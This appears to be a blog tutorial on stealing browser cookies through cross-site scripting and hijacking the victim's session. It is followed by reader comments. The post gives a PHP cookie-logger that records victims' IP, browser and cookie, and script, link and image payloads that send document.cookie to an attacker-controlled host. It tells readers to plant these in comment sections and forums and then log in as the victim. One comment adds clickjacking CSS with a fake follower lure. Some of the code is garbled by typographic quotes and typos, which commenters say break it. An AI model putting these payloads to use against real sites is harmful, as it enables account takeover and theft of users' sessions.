Cookies Stealing

Here we show how you can hack a session using javascript and php.Everyone knows what XSS is, right? Good, I’ll spare you the definition. A common use for XSS is stealing cookies to hijack sessions and gain access to restricted web content. Cookie stealing is typically done by forcing a target’s browser to issue some sort of GET request to a server controlled by the attacker which accepts the target’s cookie as a parameter and processes it in some way. In most cases, when a cookie stealing XSS attack is successful, it generates a visual clue which can tip off the target. While it is too late at this point, stealth has been compromised, and could be the difference between the user keeping the session active, or clicking ‘log out’ and rendering your stolen cookie invalid.

Those Who Don’t Know XSS Script Attack Click Here

Cookies Stealing And Session Hijacking

What is a cookie?

A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server. A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time. Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.

Cookies Stealing

Cookies Stealing

What can we do after stealing cookie?

Well,as we know web sites authenticate their user’s with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.

This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.

PHP Code:
<?php

function GetIP()
{
if (getenv(“HTTP_CLIENT_IP”) && strcasecmp(getenv(“HTTP_CLIENT_IP”), “unknown”))
$ip = getenv(“HTTP_CLIENT_IP”);
else if (getenv(“HTTP_X_FORWARDED_FOR”) && strcasecmp(getenv(“HTTP_X_FORWARDED_FOR”), “unknown”))
$ip = getenv(“HTTP_X_FORWARDED_FOR”);
else if (getenv(“REMOTE_ADDR”) && strcasecmp(getenv(“REMOTE_ADDR”), “unknown”))
$ip = getenv(“REMOTE_ADDR”);
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], “unknown”))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = “unknown”;
return($ip);
}

function logData()
{
$ipLog=”log.txt”;
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get(‘register_gobals’);
if ($register_globals) $ip = getenv(‘REMOTE_ADDR’);
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date (“l dS of F Y h:i:s A”);
$log=fopen(“$ipLog”, “a+”);

if (preg_match(“/\bhtm\b/i”, $ipLog) || preg_match(“/\bhtml\b/i”, $ipLog))
fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
“);
else
fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n”);
fclose($log);
}

logData();

?>

Save the script as a cookielogger.php on your server.(You can get any free webhosting easily such as justfree,x10hosting etc..)

Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.

Cookies Stealing

Cookies Stealing

Now for the hack to work we have to inject this piece of javascript into the target’s page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.The best way is to look for user interactive sites which contain comments or forums.

Post the following code which invokes or activates the cookielogger on your host.

Code:
<script language=”Java script”>
document.location=”http://www.yourhost.com/cookielogger.php?cookie=&quot; + document.cookie;
</script>

Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.

Code:
<a href=”java script:document.location=’http://www.yourhost.com/cookielogger.php?cookie=’+document.cookie;”>Click here!</a>

Clicking an image also can activate the script.For this purpose you can use the below code.

Code:
<a href=”java script:document.location=’http://www.yourhost.com/cookielogger.php?cookie=’+document.cookie;”&gt;

<img src=”URL OF THE IMAGE”/></a>

All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver

In the above codes please remove the space in between javascript.

Hijacking the Session:

Now we have cookie,what to do with this..?Download cookie editor mozilla plugin or you may find other plugins as well.

Go to the target site–>open cookie editor–>Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account.

About these ads

13 thoughts on “Cookies Stealing

  1. iframe { /* iframe from facebook.com */
    width:300px;
    height:100px;
    position:absolute;
    top:0; left:0;
    filter:alpha(opacity=50); /* in real life opacity=0 */
    opacity:0.5;
    }

    Click on the link to get more followers:

    CLICK ME!

    You’ll be get 10000 followers..!!

    Reply
  2. Parse error: syntax error, unexpected T_STRING in /home/u976776268/public_html/cookielogger.php on line 31

    not work

    Reply
  3. its working but im not getting cookie or ip address in my log file.
    the type of browser being used by victim is showing up but not ip address and log file
    can someone who knows what they r doing please help

    Reply
  4. Dude, first of all, I think the way to enter cookies is wrong. Only the end tagline is being entered which is after the link. “cookie=&quot” is only being displayed. And the main thing for session hijacking is the cookie. Please do something of the cookie!

    Reply

Comments Are Welcome

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s